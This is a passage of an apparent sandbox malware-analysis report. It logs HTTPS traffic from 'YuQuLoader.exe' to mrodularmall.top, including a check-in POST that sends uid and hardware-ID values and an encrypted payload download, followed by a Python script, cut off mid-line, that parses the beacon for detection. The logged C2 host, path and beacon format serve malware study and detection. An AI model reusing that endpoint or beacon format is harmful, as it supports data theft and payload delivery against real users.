2025-03-11 16:23:49 UTC | 15331 | OUT | Data Raw: 5c 33 d4 4a 25 33 21 0f cb ad 6f 80 7a 65 12 d5 fb 3c 0f 29 40 14 00 58 5d af 8d f0 33 fd 0d 87 87 7b 75 29 cb 11 ea 79 90 f1 91 da 7c 56 e3 76 6d e1 b7 2d 26 fb 6a a0 64 2c 8f 39 3d f6 3b 18 0c 48 62 37 70 cf 69 62 92 00 9c c1 c7 17 6a 8e 7d de fc c2 2c e2 23 72 fe ce 2a c6 49 fc 44 c5 3b b0 5c ef de 8f 96 0e 19 a8 d0 cc c3 d6 30 71 92 1d 89 a1 81 9f c8 6b 3e 26 dd 6f 60 9d 32 7f 4e 78 2d 1a e1 04 ab fb 6a 29 13 a9 b4 29 a0 5e 0b 2d 54 78 40 b4 a3 7c ff a8 84 fe 9f a9 49 c1 da d2 09 2f 9f e0 4e 5b 73 c0 b8 db 4c 0f ad b5 53 1a d0 7c c0 11 99 88 00 23 48 73 cf 69 f2 de 4c 60 32 81 12 be 9d 66 9f d7 de 96 e3 a4 05 42 69 e0 7d db 5d dd 89 a5 a2 53 52 b8 b0 63 1d 24 11 b9 f7 08 b2 56 d8 72 e8 51 8c 36 fd 14 9d 06 7e d0 3f d3 cd 97 14 97 88 a1 7f 59 14 43 cb
    Data Ascii: \3J%3!oze<)@X]3{u)y|Vvm-&jd,9=;Hb7pibj},#r*ID;\0qk>&o`2Nx-j))^-Tx@|I/N[sLS|#HsiL`2fBi}]SRc$VrQ6~?YC
2025-03-11 16:23:49 UTC | 15331 | OUT | Data Raw: c8 3d 56 14 1a 3b 2d f0 18 e3 d3 d8 8e c3 a5 2f cc bd 32 eb d9 8c f7 20 9a b5 b4 69 a3 70 f7 40 0b 86 a7 2b fa 84 9f 7c 41 8e 1d c8 33 53 51 97 45 f0 c0 45 cc 63 93 b2 2f 72 86 12 7c 71 96 52 05 4f a1 c1 e6 72 cd 9b 34 e6 37 c7 f1 9b 8e eb 0e 71 4e 01 50 73 70 4a f5 45 00 d1 db 08 40 8c 84 d4 61 79 c8 98 1a be 44 34 81 b4 18 83 a8 aa 12 e9 cc ea 4c 84 f6 01 14 e5 ec f3 f2 2b 59 c5 da 49 27 4d 09 38 5e b1 1a 68 a6 84 a1 b9 5a 40 b5 57 f0 12 fb b1 b6 13 c7 7b c9 62 fa 36 41 e2 1c 47 26 b0 d6 65 64 94 ee 46 51 b6 d0 ad 13 41 52 d1 9c 45 ee aa 1f 1d 37 e3 6e 4d ea 6b 41 6b 4f 80 ff 26 3b 12 65 49 8d 9f f2 b3 c2 40 3e e2 e9 b6 25 f5 38 ef d9 0e f2 c0 88 f9 16 94 0b fa 53 56 92 ea da e8 b7 1b 96 82 e1 d8 2b 26 72 4d 1c d8 62 51 3b de 41 9a 95 11 c3 12 58 ca 27
    Data Ascii: =V;-/2 ip@+|A3SQEEc/r|qROr47qNPspJE@ayD4L+YI'M8^hZ@W{b6AG&edFQARE7nMkAkO&;eI@>%8SV+&rMbQ;AX'
2025-03-11 16:23:49 UTC | 15331 | OUT | Data Raw: 42 9c a5 ef e0 df 41 48 d7 8b b3 7f 7f 6d 49 30 d1 de 50 de 0a a3 27 56 d3 75 8f 5c ea 6c 7c f9 a3 25 e6 12 5f 52 f1 e6 20 b5 66 25 21 93 6a 63 b8 52 ef 1a 2c 5f 85 c5 a2 97 71 ae 85 2e d2 49 a6 62 75 1f 08 79 44 7e 53 af ea d3 f0 61 64 02 25 b8 f1 77 c2 75 0c 29 8a a1 86 a3 c0 f4 c0 4c 99 fa 7f 6f dc 8b 10 4f 0d cc 89 29 09 5f 10 3f a2 56 bc c4 f2 c3 ca a7 e1 f0 71 20 be 7c 57 53 7e 3e 76 90 aa 97 41 d3 42 04 6c 62 fc a4 2b 98 ac 9a ce 56 e9 bc c1 28 1e e2 f3 ae 37 50 35 e0 6c b6 09 7b 78 5b 85 a4 ab dc 80 fb 3e c9 6e e9 ba 8b ac 32 e1 52 b2 fe 76 e1 14 1f 91 26 06 7e 64 a9 b1 82 a9 35 50 8a 43 cc 2e 02 c4 ee 33 9b d0 9d b2 c0 42 33 2c 91 79 fa 12 f6 62 24 07 a6 50 88 57 1f fb b4 4e d8 57 2c d0 d8 9b d4 4e 9c e4 13 15 16 8e e6 ee 6c 39 b5 ef 1a ea 53 2d
    Data Ascii: BAHmI0P'Vu\l|%_R f%!jcR,_q.IbuyD~Sad%wu)LoO)_?Vq |WS~>vABlb+V(7P5l{x[>n2Rv&~d5PC.3B3,yb$PWNW,Nl9S-
2025-03-11 16:23:49 UTC | 15331 | OUT | Data Raw: 13 e0 1f 77 0a c7 54 41 06 5f 9e 2f 05 1d e5 f9 71 ce b6 28 7c 56 e6 5b ad ac 4a e7 b6 b5 ba fb a3 fb d3 b3 56 8f 1b e3 f8 ca 24 5b c7 72 a7 30 9e 5e 59 c0 8f 80 ad 0b 48 d7 78 da af 3a d7 a3 18 95 5b d9 92 df 3c 5d ee 7b ca 5a 5b 19 99 c2 d0 38 c8 f8 a5 1f 96 07 91 73 1d a6 f0 70 87 10 c2 27 5c f0 f0 50 c9 95 86 f7 62 e2 25 87 49 e5 10 00 77 1f c7 14 90 ba fd a7 63 a8 16 85 d7 a2 36 c1 dc 33 5c d7 71 cb f4 2e bc c4 14 9d fd a5 0d f6 a2 54 b7 49 ac 99 34 74 59 8a f2 f9 b0 c8 a5 cf 33 14 4d 6f c5 d1 ca 24 5a 42 ee 4b 6a 44 34 42 b6 58 11 6b 41 7f 74 a3 b0 1d b8 5c 34 e0 02 a8 90 ea 94 62 bd 42 05 f6 b7 cd 2d ce ef ba c1 f3 16 54 ab ac 4b 62 8f 68 b6 61 63 a6 9f e5 3e 9e 2d cb 72 93 7b bf 35 6d ab 09 00 29 65 69 f3 af 32 7f 39 9c a5 1f 0d bf 83 8f 69 a8 56
    Data Ascii: wTA_/q(|V[JV$[r0^YHx:[<]{Z[8sp'\Pb%Iwc63\q.TI4tY3Mo$ZBKjD4BXkAt\4bB-TKbhac>-r{5m)ei29iV
2025-03-11 16:23:49 UTC | 15331 | OUT | Data Raw: 14 4f 36 a9 56 03 42 eb be a1 cd a5 cc 37 a4 16 4f 06 48 48 7b 7c 25 3b 46 ee 2c a1 5f 0c 2a 58 73 a2 5d a3 de 9b 0f e2 5a f0 c7 47 3e be c4 29 2b d0 03 2c 3f bf 2f 46 58 07 d6 f6 de 30 25 b7 76 d2 f5 cb a7 fe 31 80 b7 e2 00 0a 60 3f a0 d0 7f fe 0c 2d 25 ec 69 a2 80 cd 0d 80 1d 6d 94 10 39 99 af 48 42 d8 43 31 25 05 8e aa 63 83 23 4b 2f ed 1d e1 23 f5 17 02 1f b6 df c2 7f f8 d7 61 c9 78 4a e2 fa e8 34 49 35 33 b6 ad ea 33 c7 be 01 f3 ce e9 e5 97 f0 55 1a 22 bf dd 90 51 48 9a f2 35 36 ea 1e cc aa 68 6b 47 17 0f cf 53 e6 c8 4b f9 df e9 27 7a a3 34 9a cf fb a4 86 5d 92 5c 51 3c 5a c6 3a 96 a6 0f f7 fb 93 8c 37 c6 61 7e ee 2d 04 8f f5 4b 56 08 a6 bd b4 dc 3a 28 ca e0 f5 8a 9f 79 f1 b6 df 5f fa e0 6c 84 b2 92 6b 6d a9 38 1b 6a 10 c9 9a e5 c0 ea 51 84 82 aa f0
    Data Ascii: O6VB7OHH{|%;F,_*Xs]ZG>)+,?/FX0%v1`?-%im9HBC1%c#K/#axJ4I533U"QH56hkGSK'z4]\Q<Z:7a~-KV:(y_lkm8jQ
2025-03-11 16:23:49 UTC | 15331 | OUT | Data Raw: 96 f9 b9 bc 75 8f 41 c2 ce 0e 2d 4d ba c0 19 c3 b2 ab da ce a4 2f c7 e4 f2 06 04 f7 ca 07 7a 2d 6e 5e 93 26 3e 57 09 3c 08 c5 5f 16 3a 66 d6 90 83 7f b9 d6 93 9a 7f ce 53 20 fd 85 a4 7c 0b 8c a4 3d 3a c8 4e a9 72 2b 2a 64 9c 9b 78 87 46 c0 11 bc 4c 37 3d 6a 83 45 4a d3 7a 34 1e 52 16 37 67 c2 2a 11 11 05 a8 5c b8 25 e4 57 6d 17 4c 66 90 86 ff 73 56 1e 9a 1b 8d f6 f9 67 d9 a2 3f 25 2c b2 27 80 da 32 fe 2d 69 de 0f 27 d8 c8 be 10 a9 02 ca 06 2b 55 3d c4 00 40 ba 94 8f a1 79 bc 52 3c e9 74 94 cc ca 04 a4 dc bf d4 6f 35 0d d2 4b 4b c1 86 6a cb 20 96 05 fc 7f 2e 44 6e 01 52 0a 2d 2f b7 f7 ea 9c 9a 0d 65 6f 5a 30 95 a0 06 ee f0 44 b6 b6 61 6b 24 6e e8 4d 4f d7 ca 36 6d d8 af 19 9f d8 4c ad 28 1f eb 2e a9 e6 93 f5 87 90 64 ba 33 ab ec 19 35 33 31 4f bf bd a5 94
    Data Ascii: uA-M/z-n^&>W<_:fS |=:Nr+*dxFL7=jEJz4R7g*\%WmLfsVg?%,'2-i'+U=@yR<to5KKj .DnR-/eoZ0Dak$nMO6mL(.d3531O
2025-03-11 16:23:53 UTC | 819 | IN | HTTP/1.1 200 OK
    Date: Tue, 11 Mar 2025 16:23:53 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ibgpD%2Ft5wd2rXFmhIM%2BzmXaDrDaYXOlzaVw%2BYq1OgF9lhzvKJXuvqFkVMTEaT%2B4WxrWAwDblb4q7isuHnWrUzyzmCKdHKQHoi8I7f0K97OlMPzCv43RTD927FFw6pQo24iJN"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 91ec660a4d4b42c8-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=45251&min_rtt=30572&rtt_var=34027&sent=231&recv=436&lost=0&retrans=1&sent_bytes=4230&recv_bytes=590269&delivery_rate=30991&cwnd=32&unsent_bytes=0&cid=ce566d772c5b5aa8&ts=3557&x=0"


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.2.549725104.21.112.14438668C:\Users\user\Desktop\YuQuLoader.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-03-11 16:23:55 UTC266OUTPOST /aNzS HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 103
                                                                                    Host: mrodularmall.top
                                                                                    2025-03-11 16:23:55 UTC103OUTData Raw: 75 69 64 3d 37 31 64 64 34 65 64 38 37 63 64 30 31 31 64 66 30 36 34 38 38 37 32 63 30 31 36 36 30 32 33 61 35 35 34 36 37 34 32 66 65 39 34 63 66 64 39 63 61 61 66 64 37 65 61 34 26 63 69 64 3d 26 68 77 69 64 3d 35 32 30 46 34 41 46 36 31 43 42 30 32 45 31 39 33 31 32 43 38 36 37 33 45 45 31 37 31 45 38 41
                                                                                    Data Ascii: uid=71dd4ed87cd011df0648872c0166023a5546742fe94cfd9caafd7ea4&cid=&hwid=520F4AF61CB02E19312C8673EE171E8A
                                                                                    2025-03-11 16:23:56 UTC | 786               | IN        | HTTP/1.1 200 OK
                                                                                    Date: Tue, 11 Mar 2025 16:23:56 GMT
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Length: 10553
                                                                                    Connection: close
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dTaxvz0noqHOlIaLIeKIEeijv2AGsVP%2FJaJQFb%2F9uSRjN6zQGQ62qjP5J6cgIAOHRKIIiJxVyI13T%2ByJlKh9VkhlWLM6jG8a1lacRRknWv9u9agjTcFYVGJ9Kkvz%2FMv3faDY"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 91ec662e58883b41-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=46933&min_rtt=36178&rtt_var=28812&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4230&recv_bytes=1005&delivery_rate=35250&cwnd=237&unsent_bytes=0&cid=84823d9911344a24&ts=1141&x=0"
                                                                                    2025-03-11 16:23:56 UTC583INData Raw: 84 4e 22 6e 23 05 e6 66 5c 96 dc 7b 01 41 9b d7 2e 03 16 c9 a9 65 9e af 0c db dd 12 b3 f4 f2 1c 70 a0 80 1d c1 88 81 36 fe 35 cb 72 38 33 99 45 de 0b 48 ee a2 45 01 f5 a7 ec 85 9b cd b4 78 47 cd 88 0f 7e e1 c2 92 2c ae ea f6 e1 07 42 87 90 ac 10 dc 63 65 0c 18 9b 02 ac b8 ba 5b 28 46 24 93 8d af 81 20 d7 a0 a3 cd ee 77 15 b2 96 f9 29 41 28 ab a2 e1 43 c1 97 d1 1c e1 ad cb e2 58 c5 ee 1c 2e 50 c5 51 96 d2 6f 37 0f ec f1 c8 5d 71 32 06 5f c7 50 c9 db 3c a2 24 80 3c 43 17 20 b6 bb e0 52 94 59 a0 05 c4 db 12 9c 8f f0 4d b7 fd 53 52 d5 3b d6 e0 5e d6 4e 72 bb f9 d5 21 4b ff 69 29 18 55 99 cb 2e ab a9 09 4f 9b b1 ce 48 3e fe 45 f1 1a 8a 14 b6 e2 24 01 53 ed 00 ef 81 0a b7 6b 9b 4f c7 1a 48 cb 21 ae 18 e1 14 bd dd fd 35 21 0b e3 14 5d 77 e2 a7 95 f4 b4 16 41 7a
                                                                                    Data Ascii: N"n#f\{A.ep65r83EHExG~,Bce[(F$ w)A(CX.PQo7]q2_P<$<C RYMSR;^Nr!Ki)U.OH>E$SkOH!5!]wAz
                                                                                    2025-03-11 16:23:56 UTC1369INData Raw: 5e 59 fb 94 ce 0e af 54 13 71 4a 16 50 29 4f 35 b3 1c 5d 36 28 0c e1 e8 6e 78 27 97 ca 6f 5b b6 b0 9e bf 00 73 38 c5 46 c0 3e 62 17 66 4c 1f dc 5b 7f 7c f2 0d 54 40 89 24 63 61 83 27 c7 eb 64 69 03 cd 69 5e e8 85 44 e1 2f 04 df 4c 49 eb c0 e5 df 87 f6 dc 31 84 e5 53 81 88 89 cb 5e 8e a9 dc 2f 87 07 00 bf c8 17 b6 e4 08 5e 5f cd 7b d3 e8 71 32 c7 e8 db 54 29 b8 8a 54 43 60 a7 ed 28 99 ea 28 20 94 cb ec 9a 2c 3d f8 8d 0f c0 9e 62 14 e1 7a ed cb 10 fc 27 5b 9d 96 ab 25 0d 64 32 09 f1 62 d7 58 aa ae d7 e3 ad ab 54 59 c7 84 50 eb 28 12 90 c8 f4 6e 73 00 b6 ef f5 92 f3 34 fb c2 20 7b 51 ea 25 e8 b8 6f 81 a4 e8 ff 38 6d 1c 3a eb c6 f4 4d f9 36 6f 1a b9 a1 7b f5 9a f0 96 e1 46 17 25 c0 5d 9e a5 a4 e9 30 18 45 8d be 32 a2 03 12 92 96 6a 49 45 f9 94 70 d1 01 d4 ad
                                                                                    Data Ascii: ^YTqJP)O5]6(nx'o[s8F>bfL[|T@$ca'dii^D/LI1S^/^_{q2T)TC`(( ,=bz'[%d2bXTYP(ns4 {Q%o8m:M6o{F%]0E2jIEp
                                                                                    2025-03-11 16:23:56 UTC1369INData Raw: 43 0d 20 0b f8 1e 3d f4 17 64 4f 37 f5 a7 4b 7c 5b ac 41 00 4e c6 6b 62 ec 6b 9d 76 39 25 a6 39 b8 85 b9 eb 7e 7a 52 38 07 90 c3 5b bf 87 d9 f8 64 ca aa dc af 3b ba 2b 5b 27 1d 60 94 7b c0 ef 36 d3 b7 10 15 f8 f4 91 85 93 a6 17 a1 ac af c9 b1 2e 64 42 75 88 2e a0 63 c5 2f 81 a2 f9 14 03 58 dc 12 2e 8c 89 8b 9e 86 a6 72 01 06 8c db ef 81 34 46 27 48 68 fa 35 68 55 bc d5 fe 1e f4 77 41 54 f0 60 82 aa 18 ca e0 89 ed 2b 3b 23 b4 23 a1 ee 96 66 d3 85 8e 7d 5c 24 e2 13 ec 34 2b c8 36 51 36 d1 4e 02 46 66 a8 88 74 b2 ae 4c 03 29 5e d7 5c f8 d3 cf dc f0 23 43 c1 78 5e a0 46 09 69 53 cc 59 b1 fd 24 a3 c2 43 51 d9 44 19 67 23 dd 3a c6 57 73 74 55 e7 ea 57 39 30 54 eb e6 38 50 08 b2 3f c6 42 7f c5 9d 67 71 30 2b cb a8 fd a5 75 f0 6a 1b c3 f6 23 33 60 f1 9a 99 89 9d
                                                                                    Data Ascii: C =dO7K|[ANkbkv9%9~zR8[d;+['`{6.dBu.c/X.r4F'Hh5hUwAT`+;##f}\$4+6Q6NFftL)^\#Cx^FiSY$CQDg#:WstUW90T8P?Bgq0+uj#3`
                                                                                    2025-03-11 16:23:56 UTC1369INData Raw: bf fc 08 66 1d 8c 8b c9 b0 b8 cb 31 98 5a f1 7a 70 fb 5e be f9 db ce bd 50 c2 a5 ba 56 04 15 e2 9c 38 b2 e5 f3 6d 53 79 cd b5 5a f3 2f 63 e3 62 02 4d a1 71 16 c8 da 51 8d aa 91 53 87 6c 2a 3c cf a8 c5 65 ec 1c aa 0b 03 49 78 2f 14 c3 73 8c 39 88 09 fd 4d f4 f2 c8 6b 7f a7 36 17 38 36 e3 02 41 ae 7c a8 71 0b f9 e1 b3 83 0f d8 9c a4 d0 31 ab 02 1b 23 9d 0f 8f cf e9 13 28 ae 68 99 6a cb 66 d2 79 2c a4 0e df 4c dc 39 b1 8b 96 f9 ea 07 bf 78 3d b4 0d 18 a7 45 aa 3e f9 e5 35 ef f7 fb ff 99 ae 02 9d 03 24 c4 86 f1 22 64 f3 5f 11 2d fd 9b cf 55 73 d4 86 1d 19 04 94 87 f6 76 ed 94 b5 05 5a aa 5f f6 c3 43 88 17 ae 86 68 2a 60 dc 8a 64 5d e4 e9 37 e6 5f de 21 24 fe ef 74 df 80 c2 ff 15 2e 9c e2 1e a5 71 6c 02 6c 76 1e 2a 32 eb 3d a9 7c 83 5a eb 36 42 4a 6c 56 31 a5
                                                                                    Data Ascii: f1Zzp^PV8mSyZ/cbMqQSl*<eIx/s9Mk686A|q1#(hjfy,L9x=E>5$"d_-UsvZ_Ch*`d]7_!$t.qllv*2=|Z6BJlV1
                                                                                    2025-03-11 16:23:56 UTC1369INData Raw: 46 90 d3 7d a4 be 2b 18 c3 7b 94 4d 20 9a 2d 70 42 60 75 41 c9 c6 1b ec 1e 84 4a ab 3c 7b 06 67 04 5c 67 60 b5 81 6f 0e a1 4c 5d 24 41 cf 2a 17 5d b6 c5 9c 0b 86 db 08 0d 0c 02 1d c3 0c 23 10 fe 1b 75 6e 2b f8 94 f5 fb d2 03 48 34 71 54 8b 36 de c7 9e 09 a9 37 00 e3 04 2c 16 e1 a4 93 71 51 c1 57 75 14 b2 2e 4e d2 f0 2e 62 18 bc dd 90 11 67 11 15 fd 7b aa 94 5f 77 8c c8 7a c2 c0 d5 49 07 51 8f 56 f3 a0 83 46 be 42 76 86 83 7a 6d 22 7f b0 fc 00 14 c8 24 84 c9 18 fe 7d 5e 3b df 09 7d a6 16 da 45 84 f1 b8 98 c5 36 f1 de a1 9c e0 c0 64 06 61 f6 ed fe 86 98 9d f0 2d ba 7e 1d cc 08 60 43 4b 5a 1e 14 0a 18 21 74 61 fa 5d 50 78 1f 47 79 7f b2 0e a0 9b 0a 49 de 39 36 61 ca a6 59 a5 66 a2 fa 57 26 1e 9f 3a b8 cd 89 11 44 9e 93 ab 82 96 8e 1c 76 a4 c9 e0 39 b5 1b d2
                                                                                    Data Ascii: F}+{M -pB`uAJ<{g\g`oL]$A*]#un+H4qT67,qQWu.N.bg{_wzIQVFBvzm"$}^;}E6da-~`CKZ!ta]PxGyI96aYfW&:Dv9
                                                                                    2025-03-11 16:23:56 UTC1369INData Raw: 73 9c 38 9d ea 6a c9 42 b4 fc 6f e1 e5 5c ed 7a ed 80 8f f2 f7 9b 9e 15 d9 36 43 b5 7c 95 e2 ca 61 57 94 09 36 b0 d5 7f 72 50 be 53 72 6b 10 4b 57 98 a0 16 2c bb 52 d2 e6 ea 73 56 6d ad 4b 09 be 10 5b a9 e7 50 34 93 10 aa f0 d6 38 15 2e ff af a4 9c d4 2f 59 e9 67 da 9d 81 31 7f a0 55 07 77 1c cc 49 43 70 53 df fb ab 2c 08 a7 a3 ed 21 03 50 60 e2 41 fe 48 50 b5 1c 20 55 2c 17 cf 4e 89 2f 4c 32 3e 37 da 11 5c a3 ed 56 a3 1e 13 58 90 ee d8 ef e1 cd 10 68 de ed 72 77 5a e3 8f a3 b4 dc 47 f9 25 f2 53 7b 4f 0c 26 e9 42 26 a3 46 e6 54 ac 58 59 7a 9e a2 f7 cf 9e ab 1e 68 d0 5a 2e c1 c1 60 fd 35 5d e2 c1 93 0d 60 d9 d9 8a 26 1b b7 28 d7 ff bf 3f 43 7b 79 c3 d5 dd f8 e3 40 c4 1c 29 d8 ba 3c 5f c6 5d 97 ea 61 51 18 28 e8 2d 7f b2 d3 33 ee 94 26 f2 0e f0 26 13 56 03
                                                                                    Data Ascii: s8jBo\z6C|aW6rPSrkKW,RsVmK[P48./Yg1UwICpS,!P`AHP U,N/L2>7\VXhrwZG%S{O&B&FTXYzhZ.`5]`&(?C{y@)<_]aQ(-3&&V
                                                                                    2025-03-11 16:23:56 UTC1369INData Raw: 3d 24 0d 5a 9d af db a4 9c bf 80 38 ec 8c f0 2d 9c 82 f9 0b 15 ee 3b dc c9 c0 0e 71 a8 31 d8 81 b3 31 94 49 cd f2 c6 a1 82 cb a8 10 2d 90 1d 5b 50 39 45 6b 37 d9 a0 cd e1 ac 99 c0 0f 95 34 c6 f4 fa f1 53 c8 9a 52 9c 97 a9 39 75 00 da 47 75 4d 15 fc 80 cd e6 82 28 c3 a1 f9 64 83 43 8b 9a d1 d0 c6 f4 ad f1 33 9b 6d 3e f6 57 73 94 84 66 22 14 9f f4 06 5d ae 0e 51 fd 08 b3 3a 7b 2d c4 92 f6 35 a8 83 d4 d8 27 49 68 61 f7 34 94 48 85 11 e2 8a a5 39 0a c1 7a 97 fe 04 b4 18 6c 39 30 d0 1a 66 c4 63 48 34 da ea a3 62 19 6c 47 54 73 3a 90 fa e0 ae 1d cf a0 68 79 ea 49 03 48 1a 1b 15 15 c4 04 a4 70 ba 60 93 b8 c6 17 62 55 70 b7 c2 bb 5e 9d 86 6a d1 e9 05 e3 5c 39 15 d1 e3 c7 aa 81 53 33 51 53 e0 f0 6b c5 93 dd c9 ce 93 9a 07 9f c9 17 77 7a 8e 6e 9c 33 f6 e3 c6 75 f1
                                                                                    Data Ascii: =$Z8-;q11I-[P9Ek74SR9uGuM(dC3m>Wsf"]Q:{-5'Iha4H9zl90fcH4blGTs:hyIHp`bUp^j\9S3QSkwzn3u
                                                                                    2025-03-11 16:23:56 UTC1369INData Raw: 7b d2 90 de 58 37 5e 78 59 73 b7 6e 37 ec 68 72 ab 03 a5 de 73 96 04 44 06 b8 10 ac d6 0d 58 82 1f 1b 5d f3 df e4 e2 8d 0e 85 aa ec c2 3d 8b e3 52 09 25 54 c2 82 23 4b d7 aa fc 9f 93 be 8b 3a 9c 03 e6 c6 f9 3f 7d cc 35 7c e1 82 f8 ad 60 3b cc 3b 0f 26 18 2e d8 97 5a bc e3 d8 d2 35 42 2b a9 aa 98 92 75 af 77 c3 24 4b 1a b6 06 e6 40 1a 3a 3f 44 2a 4a 3e d1 55 61 ea 8d c3 c6 09 fa 96 2f 49 41 fc b8 87 49 c7 5a bb 03 9e d4 2b a2 c1 ca 76 34 b5 de c8 67 1f 2d 04 8f f9 bf 4e 47 91 b7 8d 5a 13 d1 82 5c 3e 71 de 0f c3 7e 61 3f fe cb e2 a3 9b 0a 9b 40 4d 58 8b 5a ed b6 75 aa 4f e3 cf 8b 4e 74 55 c7 f0 12 70 51 75 f9 c5 37 bd ee b0 c0 27 90 e7 64 96 fc ce 5d 24 2f 2a ac 8e 19 6a 08 d4 b6 0a 7e f4 e6 ef 9a 40 c7 46 55 b6 13 a6 3c a0 f8 11 91 b7 e4 99 de e7 b6 36 12
                                                                                    Data Ascii: {X7^xYsn7hrsDX]=R%T#K:?}5|`;;&.Z5B+uw$K@:?D*J>Ua/IAIZ+v4g-NGZ\>q~a?@MXZuONtUpQu7'd]$/*j~@FU<6
                                                                                    2025-03-11 16:23:56 UTC387INData Raw: 8a d6 4c 75 99 d4 bd 6a 6c 23 ad 24 6b ce 5a 87 cb 88 b5 b9 a5 09 5a 31 54 ad 56 4f 85 29 3c b4 6c 4c b4 38 43 b0 92 1a e9 00 4e 67 5d a4 25 20 98 67 67 1c 48 8a 1a 4e bd df e9 81 93 70 9b cb b3 2e 5f dc 0c da 06 14 e7 cb 51 3b 0a 75 83 af b1 3e 49 62 1e 2e 74 ee f5 0b 6d 93 ac cb 19 d1 7a 2c 3d d5 c1 12 a5 2e ed 97 42 67 92 81 1e 23 b7 61 20 78 6d ed 00 59 21 68 30 e3 50 1b 25 04 00 e3 68 df a7 d5 d1 7c 7a fa 4c 44 d5 2c 6f 2f d2 72 b2 d5 13 ab 0b 99 e2 da 73 fc 52 0d 4d a7 f4 e9 ca 40 65 04 23 16 5b 69 e8 5b 10 33 29 c3 2d 1b ec 62 6f a0 a9 78 e8 82 34 86 c7 f7 36 96 22 9b df d9 34 3f 1d 5a 1b 97 d5 2e 46 f5 77 cb 72 2b 7c e8 5c c9 f7 79 e6 97 08 a8 04 fe 26 7f 75 9e ff b6 a1 17 3f f8 ef 40 ad 51 73 d8 00 b2 2b d0 4d 4b 6a e8 06 3a 75 44 ed c8 2c 29 f9
                                                                                    Data Ascii: Lujl#$kZZ1TVO)<lL8CNg]% ggHNp._Q;u>Ib.tmz,=.Bg#a xmY!h0P%h|zLD,o/rsRM@e#[i[3)-box46"4?Z.Fwr+|\y&u?@Qs+MKj:uD,)
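The exchange above is the stealer's check-in: a form-encoded POST whose body carries exactly three keys, a hex uid, an empty cid and a 32-hex-digit hwid, answered by a 10553-byte application/octet-stream body that arrives as one 583-byte chunk, seven 1369-byte chunks and a 387-byte tail. The following Python is an added example, not part of this report and not Joe Security tooling: it parses the captured request, confirms that the declared Content-Length matches the body and that the captured response chunks add up to the declared length, and scores the field shape as a detection indicator. The request text and chunk sizes are transcribed from the table above (CRLF line endings are assumed, the report does not show them); the indicator names and the helper functions are this example's own.

```python
import re
from urllib.parse import parse_qsl

# Request transcribed from the HTTPS session table in this report (constructed
# string; CRLF line endings are an assumption, the report does not show them).
CAPTURED_REQUEST = (
    "POST /aNzS HTTP/1.1\r\n"
    "Connection: Keep-Alive\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36\r\n"
    "Content-Length: 103\r\n"
    "Host: mrodularmall.top\r\n"
    "\r\n"
    "uid=71dd4ed87cd011df0648872c0166023a5546742fe94cfd9caafd7ea4"
    "&cid=&hwid=520F4AF61CB02E19312C8673EE171E8A"
)

# Byte counts of the IN chunks the report lists for the response body, and the
# Content-Length the server declared; used to confirm the capture is complete.
RESPONSE_CHUNK_SIZES = [583] + [1369] * 7 + [387]
RESPONSE_CONTENT_LENGTH = 10553

HEX_RE = re.compile(r"[0-9a-fA-F]+")
UPPER_HEX32_RE = re.compile(r"[0-9A-F]{32}")


def parse_http_request(raw):
    """Split a raw HTTP/1.1 request into method, path, version, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version,
            "headers": headers, "body": body}


def beacon_fields(req):
    """Form fields of the body, in wire order, as (key, value) pairs."""
    return parse_qsl(req["body"], keep_blank_values=True)


def beacon_indicators(req):
    """Names of the structural indicators this request matches (names are this example's own)."""
    hits = []
    headers = req["headers"]
    if req["method"] != "POST":
        return hits
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        hits.append("form-post")
    declared = headers.get("content-length")
    if declared is not None and int(declared) == len(req["body"]):
        hits.append("content-length-matches-body")
    fields = beacon_fields(req)
    if [key for key, _ in fields] == ["uid", "cid", "hwid"]:
        hits.append("form-keys-uid-cid-hwid")
        values = dict(fields)
        if HEX_RE.fullmatch(values["uid"]):
            hits.append("uid-is-hex")
        if values["cid"] == "":
            hits.append("cid-empty")
        if UPPER_HEX32_RE.fullmatch(values["hwid"]):
            hits.append("hwid-is-32-upper-hex")
    return hits


def is_lumma_like_checkin(req):
    """True only when the shape indicators line up; values themselves are never matched."""
    needed = {"form-post", "form-keys-uid-cid-hwid", "uid-is-hex", "hwid-is-32-upper-hex"}
    return needed.issubset(beacon_indicators(req))


def response_capture_complete(chunk_sizes, declared_length):
    """True when the captured IN chunks add up to the declared Content-Length."""
    return sum(chunk_sizes) == declared_length


if __name__ == "__main__":
    req = parse_http_request(CAPTURED_REQUEST)
    print(req["method"], req["path"], "Host:", req["headers"]["host"])
    print("indicators:", beacon_indicators(req))
    print("lumma-like check-in:", is_lumma_like_checkin(req))
    print("response capture complete:",
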